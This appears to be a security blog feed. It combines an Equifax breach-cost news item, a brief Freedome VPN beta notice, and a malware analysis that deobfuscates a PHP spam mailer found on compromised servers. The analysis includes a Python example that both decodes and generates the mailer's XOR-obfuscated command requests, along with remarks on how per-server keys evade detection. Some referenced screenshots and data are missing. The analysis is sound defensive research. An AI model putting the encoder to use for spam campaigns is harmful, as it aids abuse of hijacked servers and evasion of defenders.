“It looks like this will be the most expensive data breach in history,” said Larry Ponemon, chairman of Ponemon Institute, a research group that tracks costs of cyber attacks.

Total costs of the breach, which compromised sensitive data of some 247 million consumers, could be “well over $600 million,” after including costs to resolve government investigations into the incident and civil lawsuits against the firm, he said.

The post Equifax breach could be most costly in corporate history appeared first on CyberESI.

Posted: 2 Mar 2018 | 11:37 am

Deobfuscating a “Sophisticated” Mailer

“Sophisticated” in that the spammer obfuscated the mailer script quite well. He/she apparently put quite a bit of work into concealing and protecting their spamming activity. I normally don’t come across PHP mailers that are obfuscated this well.

Here’s what the incoming traffic to the PHP script looks like:

If the request is successfully processed then the following (more or less) gets returned:


After cleaning up the HTTP request body and separating the parameters, you can see that there are five sets of parameters. Remember this for later.

Now let’s have a look at the PHP script. The top part contains a large base64-encoded blob. At the bottom you can see that it reads in the cookie value and uses it to XOR the second, shorter base64-encoded string.

I’m in the process of rewriting Converter so it’s a good time to put this new program to the test. Here’s what Reneo looks like when I de-XOR the string.

I get another layer of obfuscation so I just repeat the process.

This is the result. This function reads in the large blob at the top, splits everything into four characters, builds an extraction list, reorders it in a certain way, concatenates a base64 string, decodes it, then evals the result.

Here’s the final, deobfuscated mailer script. The interesting bits are at the beginning.

The mailer script reads in the POST body, sorts the variables and concatenates them, then XORs this value with a hardcoded key.

Let’s go through this step-by step. Based on the above five sets of parameters, the variables are:


Sorted and joined together it becomes:


This value is then XOR’d with the hardcoded key built into the script, e886f82a-1c47-4677-93a6-5181ff8b8977, which results in the following in hex. This is the XOR key to decrypt the POST request values.


If I take the values from the POST request, sort it by the same variable name then join the values together, it will look something like this (truncated base64-encoded string):


I then XOR this string with the key and get the mailing instructions which include the campaign info and recipients:
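The POST-body scheme walked through above, as an added example written for this page rather than the spammer's own code. The hardcoded key is the one quoted in the post; everything else is an assumption: that both XORs cycle the shorter key PHP-style (`$key[$i % strlen($key)]`), that each parameter value is base64 and is decoded before joining, and that the parameter names and mailing instructions below, which are constructed, stand in for the real ones. The script-unpacking layer keyed by the cookie is not covered here.

```python
"""Derive the per-request XOR key from sorted POST variable names and the
hardcoded key, then decrypt the sorted, joined values. Added example; the
cycling and base64 handling are assumptions, the GUID is from the post."""
import base64
from itertools import cycle

HARDCODED_KEY = "e886f82a-1c47-4677-93a6-5181ff8b8977"


def xor_cycle(data: bytes, key: bytes) -> bytes:
    """XOR data against key, repeating the key as PHP's $key[$i % strlen] would."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def derive_key(param_names, hardcoded: str = HARDCODED_KEY) -> bytes:
    """Sort the POST variable names, concatenate them, XOR with the hardcoded key."""
    joined = "".join(sorted(param_names)).encode()
    return xor_cycle(joined, hardcoded.encode())


def decode_post(params: dict, hardcoded: str = HARDCODED_KEY) -> bytes:
    """Server side: sort values by variable name, join (base64-decoded), XOR with the derived key."""
    key = derive_key(params, hardcoded)
    blob = b"".join(base64.b64decode(params[name]) for name in sorted(params))
    return xor_cycle(blob, key)


def encode_post(instructions: bytes, param_names, hardcoded: str = HARDCODED_KEY) -> dict:
    """Client side: what the spam controller would send. Splits the ciphertext
    evenly over the parameters so that sorted-join on the server reassembles it."""
    names = sorted(param_names)
    ciphertext = xor_cycle(instructions, derive_key(names, hardcoded))
    chunk = -(-len(ciphertext) // len(names))            # ceiling division
    return {name: base64.b64encode(ciphertext[i * chunk:(i + 1) * chunk]).decode()
            for i, name in enumerate(names)}


# Constructed: five parameter names, like the five sets seen in the request.
PARAM_NAMES = ["ccd2", "a91f", "x7", "m1", "q0"]
INSTRUCTIONS = (b'{"campaign":"run-17","from":"noreply@example.com",'
                b'"to":["alice@example.org","bob@example.net"]}')

if __name__ == "__main__":
    request = encode_post(INSTRUCTIONS, PARAM_NAMES)
    print("derived key:", derive_key(PARAM_NAMES).hex())
    print("POST body  :", "&".join(f"{k}={v}" for k, v in request.items()))
    print("decoded    :", decode_post(request))
```

The point the layering makes: the variable names are part of the key material, so a captured POST body decrypts only with the server's hardcoded key, and the hardcoded key is only reachable after unpacking the script with the cookie value. Either artefact alone is useless, which is what makes per-server key and cookie values an effective way to stay under the radar.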

The spam message in this specific run looks like this:

The obfuscated PHP script can be found online (here and here). However, without the cookie value from the POST request, it would be very difficult to deobfuscate the PHP script. Additionally, the POST request cannot be deobfuscated without knowing the hardcoded XOR key in the PHP script. I’m fairly certain that the cookie value and XOR key will all be different for each compromised server which is probably why this is going under the radar.

Posted: 25 Feb 2018 | 6:19 pm

Freedome VPN For Mac OS X

Take a look at this:

F-Secure Freedome for OS X (freshly installed on a Labs Mac Team MacBook).


The beta is now open for everyone to try for 60 days at no cost.


On 24/04/15 At 12:37 PM

Posted: 24 Apr 2015 | 1:37 am